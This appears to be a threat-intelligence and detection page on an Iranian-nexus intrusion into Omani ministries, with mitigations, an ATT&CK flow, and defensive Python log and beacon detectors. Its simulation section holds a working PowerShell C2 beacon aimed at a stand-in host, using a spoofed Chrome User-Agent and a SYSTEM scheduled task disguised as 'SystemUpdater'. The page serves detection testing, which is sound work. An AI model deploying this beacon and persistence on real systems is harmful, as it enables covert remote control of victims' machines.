Iranian-Nexus Attack Exposes 26,000 Citizen Records in Oman
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
A state-aligned Iranian threat actor compromised multiple government ministries in Oman by using webshells, ProxyShell exploits, and a custom command-and-control environment hosted on a UAE-based VPS. The attackers exfiltrated more than 26,000 user records and registry hives, then deployed post-compromise tools including Chisel and GodPotato to deepen access. The operation was further exposed by an open directory that unintentionally revealed the attackers’ tooling, scripts, and C2 logs, providing visibility into the full intrusion lifecycle.
Investigation
Researchers accessed the exposed VPS at 172.86.76.127 and identified webshells, Python-based command-and-control scripts, privilege-escalation tools, and multiple exploit scripts targeting ProxyShell and the DNN SSRF vulnerability. Network logs showed beaconing activity over ports 8001 and 8002, along with use of Chisel tunnels for covert access. The investigation also documented scheduled task creation, extraction of registry hives, and large-scale data dumping from compromised systems.
Mitigation
Organizations should apply all patches related to ProxyShell in Microsoft Exchange and remediate the DNN SSRF issue tracked as CVE-2025-32372. Web applications should be hardened, IIS accounts should run with least privilege, and unused ASP.NET pages should be disabled wherever possible. Defenders should also deploy web application firewalls, monitor outbound traffic over unusual ports, and regularly inspect internet-facing servers for abandoned or exposed directories.
Response
Security teams should create detections for webshell access patterns, PowerShell beaconing behavior, Chisel tunnel activity, and suspicious scheduled task creation. Incident responders should collect web server logs, registry hives, and any database dumps for forensic analysis. Affected systems should be isolated, credentials rotated, and the relevant Omani authorities or stakeholders notified without delay.
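The webshell and source-IP detections called for above, as an added example that is not part of this report or its detection content: a Python scan over IIS W3C logs that flags requests to the two webshell names the report names (hc2.aspx, health_check_t.aspx) and requests from the VPS address it documents (172.86.76.127). The ProxyShell check is a heuristic taken from common public detection practice, not from the report: an `@` appearing in the autodiscover.json query string before any `key=value` pair, which legitimate Autodiscover clients do not produce. The log lines, field layout and function names (`parse_w3c`, `scan`, `summarize`) are constructed for the example.

```python
"""Webshell / ProxyShell / IOC scan over IIS W3C extended logs (added example)."""
import re
from collections import Counter

# Webshell file names and VPS address taken from the report.
WEBSHELL_NAMES = {"hc2.aspx", "health_check_t.aspx"}
IOC_SOURCE_IPS = frozenset({"172.86.76.127"})

# Heuristic (assumption, not from the report): an '@' in the autodiscover.json
# query before any '=' is characteristic of ProxyShell path confusion, while a
# normal client sends something like ?Email=user@corp.example.
PROXYSHELL_RE = re.compile(r"/autodiscover/autodiscover\.json\?[^=]*@", re.IGNORECASE)

# Constructed sample log, not real telemetry. IIS encodes spaces inside a field as '+'.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query c-ip cs(User-Agent) sc-status
2025-01-10 09:00:01 10.0.0.5 GET /owa/auth/logon.aspx - 203.0.113.7 Mozilla/5.0+(Windows+NT+10.0) 200
2025-01-10 09:00:03 10.0.0.5 GET /autodiscover/autodiscover.json Email=user@corp.example 203.0.113.7 Outlook/16.0 200
2025-01-10 09:00:05 10.0.0.5 GET /autodiscover/autodiscover.json @constructed.example/ews 198.51.100.9 python-requests/2.31 200
2025-01-10 09:00:09 10.0.0.5 POST /aspnet_client/hc2.aspx - 198.51.100.9 Mozilla/5.0 200
2025-01-10 09:00:12 10.0.0.5 GET /owa/auth/health_check_t.aspx - 172.86.76.127 Mozilla/5.0 200
2025-01-10 09:01:00 10.0.0.5 GET /ecp/default.aspx - 203.0.113.7 Mozilla/5.0 200
"""


def parse_w3c(text):
    """Parse W3C extended log text into dicts keyed by the names in the #Fields header."""
    fields, rows = [], []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]      # column names follow the directive
            continue
        if line.startswith("#"):
            continue                        # other directives (#Software, #Date, ...)
        values = line.split()
        if not fields or len(values) != len(fields):
            continue                        # malformed row or row before any header
        rows.append(dict(zip(fields, values)))
    return rows


def scan(rows, ioc_ips=frozenset()):
    """Return one finding per row that matches at least one rule, in log order."""
    findings = []
    for r in rows:
        stem = r.get("cs-uri-stem", "")
        query = r.get("cs-uri-query", "")
        rules = []
        if stem.rsplit("/", 1)[-1].lower() in WEBSHELL_NAMES:
            rules.append("webshell_access")
        # Rebuild the request target so the heuristic sees stem and query together.
        if query != "-" and PROXYSHELL_RE.search(f"{stem}?{query}"):
            rules.append("proxyshell_path_confusion")
        if r.get("c-ip") in ioc_ips:
            rules.append("ioc_source_ip")
        if rules:
            findings.append({
                "time": f"{r.get('date', '')} {r.get('time', '')}",
                "client": r.get("c-ip"),
                "uri": stem,
                "rules": rules,
            })
    return findings


def summarize(findings):
    """Count findings per client IP, useful for prioritising which source to pivot on."""
    return dict(Counter(f["client"] for f in findings))


if __name__ == "__main__":
    hits = scan(parse_w3c(SAMPLE_LOG), IOC_SOURCE_IPS)
    for h in hits:
        print(h["time"], h["client"], h["uri"], ",".join(h["rules"]))
    print("per-client:", summarize(hits))
```

The parser keys columns off the `#Fields:` directive rather than fixed positions, because IIS sites log different column sets; swap `SAMPLE_LOG` for a real `u_ex*.log` file to run it on production data.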
Attack Flow
graph TB
    %% Class Definitions Section
    classDef technique fill:#c2e0ff
    classDef tool fill:#cccccc
    %% Node Definitions – Techniques
    initial_access["<b>Technique</b> – <b>T1190 Exploit Public-Facing Application</b><br/>Method: ProxyShell & DNN SSRF"]
    class initial_access technique
    remote_services["<b>Technique</b> – <b>T1210 Exploitation of Remote Services</b><br/>Lateral movement"]
    class remote_services technique
    web_shell["<b>Technique</b> – <b>T1505.003 Web Shell</b><br/>Deployed: hc2.aspx / health_check_t.aspx"]
    class web_shell technique
    c2_bidir["<b>Technique</b> – <b>T1102.002 Web Service Bidirectional Communication</b><br/>HTTP C2 server"]
    class c2_bidir technique
    tunneling["<b>Technique</b> – <b>T1572 Protocol Tunneling</b> & <b>T1219.001 IDE Tunneling</b><br/>Tool: Chisel"]
    class tunneling technique
    weaken_enc["<b>Technique</b> – <b>T1600 Weaken Encryption</b><br/>Applied to tunnel"]
    class weaken_enc technique
    priv_esc["<b>Technique</b> – <b>T1134.003 Access Token Manipulation</b> & <b>T1068 Exploitation for Privilege Escalation</b><br/>Tool: GodPotato"]
    class priv_esc technique
    account_manip["<b>Technique</b> – <b>T1098 Account Manipulation</b><br/>Maintain elevated rights"]
    class account_manip technique
    cred_access["<b>Technique</b> – <b>T1012 Query Registry</b><br/>Steal SAM/System hives"]
    class cred_access technique
    def_evasion["<b>Technique</b> – <b>T1562 Impair Defenses</b> & <b>T1668 Exclusive Control</b><br/>Disable AV"]
    class def_evasion technique
    discovery["<b>Technique</b> – <b>T1592.002 Gather Victim Host Info</b> & <b>T1590.001 Network Domain Properties</b>"]
    class discovery technique
    exfiltration["<b>Technique</b> – <b>T1041 Exfiltration Over C2 Channel</b> & <b>T1030 Data Transfer Size Limits</b>"]
    class exfiltration technique
    oneway["<b>Technique</b> – <b>T1102.003 One-Way Web Service Communication</b><br/>Result posting"]
    class oneway technique
    %% Node Definitions – Tools / Malware
    tool_proxyshell["<b>Tool</b> – <b>Name</b>: ProxyShell<br/><b>Purpose</b>: Exploit Exchange Server"]
    class tool_proxyshell tool
    tool_chisel["<b>Tool</b> – <b>Name</b>: Chisel<br/><b>Purpose</b>: Tunneling"]
    class tool_chisel tool
    tool_godpotato["<b>Tool</b> – <b>Name</b>: GodPotato<br/><b>Purpose</b>: Privilege escalation"]
    class tool_godpotato tool
    %% Connections – Attack Flow
    initial_access -->|leads_to| remote_services
    initial_access -->|uses| tool_proxyshell
    remote_services -->|leads_to| web_shell
    web_shell -->|enables| c2_bidir
    c2_bidir -->|uses| tunneling
    tunneling -->|uses| tool_chisel
    tunneling -->|enables| weaken_enc
    weaken_enc -->|enables| priv_esc
    priv_esc -->|uses| tool_godpotato
    priv_esc -->|enables| account_manip
    account_manip -->|enables| cred_access
    cred_access -->|enables| def_evasion
    def_evasion -->|enables| discovery
    discovery -->|enables| exfiltration
    exfiltration -->|uses| oneway
Detections
- The Possibility of Execution Through Hidden PowerShell Command Lines (via cmdline)
- Download or Upload via Powershell (via cmdline)
- Possible Account or Group Enumeration / Manipulation (via cmdline)
- LOLBAS Schtasks (via cmdline)
- IOCs (HashSha256) to detect: Iranian-Nexus Operation Against Oman’s Government: 12 Ministries Hit and 26,000 Citizen Records Exposed
- IOCs (SourceIP) to detect: Iranian-Nexus Operation Against Oman’s Government: 12 Ministries Hit and 26,000 Citizen Records Exposed
- IOCs (DestinationIP) to detect: Iranian-Nexus Operation Against Oman’s Government: 12 Ministries Hit and 26,000 Citizen Records Exposed
- Detection of hc2.aspx and health_check_t.aspx Webshells and ProxyShell Exploitation [Webserver]
- Detection of PowerShell Command Polling and Exfiltration via Spoofed Chrome User-Agent [Windows Powershell]
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.
Attack Narrative & Commands:
The attacker has already gained a foothold on the victim machine and wishes to establish a low-noise C2 beacon. They drop the PowerShell script new_beacon.ps1 into the user’s AppData folder. The script runs in an infinite loop, polling a remote C2 every 30 seconds. Each HTTP request is crafted with a Chrome UA string to blend in with normal web traffic, thereby evading network-based detections (T1217, T1674). The attacker starts the beacon via a scheduled task to ensure persistence (T1204.004).
Regression Test Script:
# -------------------------------------------------
# Deploy and start the new_beacon PowerShell beacon
# -------------------------------------------------
$beaconPath = "$env:APPDATA\new_beacon.ps1"
$c2Url = "http://malicious.example.com/beacon"

# 1. Write the beacon script (simulated lightweight version).
#    The here-string is single-quoted, so nothing inside it expands when it is written;
#    the C2 URL is substituted into the __C2URL__ placeholder afterwards ($using: only
#    works inside Invoke-Command/Start-Job script blocks and would fail in a .ps1 file).
$scriptContent = @'
while ($true) {
    $headers = @{ "User-Agent" = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.90 Safari/537.36" }
    try {
        Invoke-WebRequest -Uri "__C2URL__" -Headers $headers -Method GET -TimeoutSec 10 | Out-Null
    } catch {}
    Start-Sleep -Seconds 30
}
'@
$scriptContent = $scriptContent -replace '__C2URL__', $c2Url
Set-Content -Path $beaconPath -Value $scriptContent -Encoding UTF8

# 2. Register a scheduled task for persistence (runs every minute)
$action    = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-NoProfile -ExecutionPolicy Bypass -File `"$beaconPath`""
$trigger   = New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1) -RepetitionDuration ([TimeSpan]::MaxValue)
$principal = New-ScheduledTaskPrincipal -UserId "SYSTEM" -LogonType ServiceAccount -RunLevel Highest
Register-ScheduledTask -TaskName "SystemUpdater" -Action $action -Trigger $trigger -Principal $principal -Force
Write-Host "Beacon deployed and scheduled task created."
Cleanup Commands:
# -------------------------------------------------
# Remove beacon and scheduled task
# -------------------------------------------------
$beaconPath = "$env:APPDATA\new_beacon.ps1"
Unregister-ScheduledTask -TaskName "SystemUpdater" -Confirm:$false
Remove-Item -Path $beaconPath -Force -ErrorAction SilentlyContinue
Write-Host "Cleanup completed."
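The detection logic the simulation above is meant to exercise, as an added example that is not part of this page or its rule content: a Python pass over outbound-request telemetry that groups requests by host, process and destination, measures how regular the inter-request gaps are, and separately flags a Chrome User-Agent sent by a process that is not a browser. The sample events are constructed to mirror the regression script (powershell.exe polling malicious.example.com every 30 s with the Chrome UA), with a genuine chrome.exe browsing session alongside as the negative case. Field layout, the `min_events`/`max_cv` thresholds, the `BROWSER_PROCESSES` allow-list and the function names (`detect_beacons`, `_constructed_events`) are assumptions for the example.

```python
"""Beacon periodicity and spoofed-UA detection over outbound request telemetry (added example)."""
from collections import defaultdict
from datetime import datetime, timedelta, timezone
from statistics import mean, pstdev
from urllib.parse import urlsplit

# Same UA string the regression script uses.
CHROME_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/118.0.5993.90 Safari/537.36")
# Assumption: processes that legitimately present a Chrome-family UA.
BROWSER_PROCESSES = {"chrome.exe", "msedge.exe"}


def _constructed_events():
    """Constructed telemetry: 'timestamp,host,process,url,user_agent' per line (not real data)."""
    base = datetime(2025, 1, 10, 9, 0, 0, tzinfo=timezone.utc)
    lines = []
    # PowerShell beacon: 30 s cadence with +/-1 s of jitter, 8 requests.
    t = base
    for jitter in (0, 1, -1, 0, 1, 0, -1, 0):
        t += timedelta(seconds=30 + jitter)
        lines.append(f"{t.isoformat()},WS01,powershell.exe,http://malicious.example.com/beacon,{CHROME_UA}")
    # Human browsing from a real browser: irregular gaps, same UA.
    t = base
    for gap in (3, 47, 2, 120, 9, 31, 200, 4):
        t += timedelta(seconds=gap)
        lines.append(f"{t.isoformat()},WS01,chrome.exe,https://news.example/,{CHROME_UA}")
    return "\n".join(lines)


def detect_beacons(log_text, min_events=5, max_cv=0.15):
    """Return one alert per (host, process, destination) group that looks like a beacon
    or that sends a browser UA from a non-browser process.

    Periodicity test: coefficient of variation (stdev/mean) of the inter-request gaps;
    sleep-loop beacons sit near 0, interactive traffic is far above max_cv.
    """
    groups = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, host, proc, url, ua = line.split(",", 4)   # UA may contain commas, keep it whole
        groups[(host, proc.lower(), urlsplit(url).netloc)].append((datetime.fromisoformat(ts), ua))

    alerts = []
    for (host, proc, dest), events in groups.items():
        events.sort()
        times = [e[0] for e in events]
        reasons = []
        if len(times) >= min_events:
            gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
            avg = mean(gaps)
            cv = pstdev(gaps) / avg if avg > 0 else float("inf")
            if cv <= max_cv:
                reasons.append(f"periodic_beacon(interval~{round(avg)}s,cv={cv:.3f})")
        if proc not in BROWSER_PROCESSES and any("Chrome/" in ua for _, ua in events):
            reasons.append("chrome_ua_from_non_browser")
        if reasons:
            alerts.append({"host": host, "process": proc, "dest": dest,
                           "count": len(events), "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect_beacons(_constructed_events()):
        print(alert)
```

Both signals are deliberately independent: the periodicity check catches a beacon even when the UA is fully convincing, and the UA/process mismatch catches a first request before enough samples exist to measure cadence. Raising `max_cv` trades false negatives against jittered beacons for more noise from pollers such as update clients, so tune it per environment.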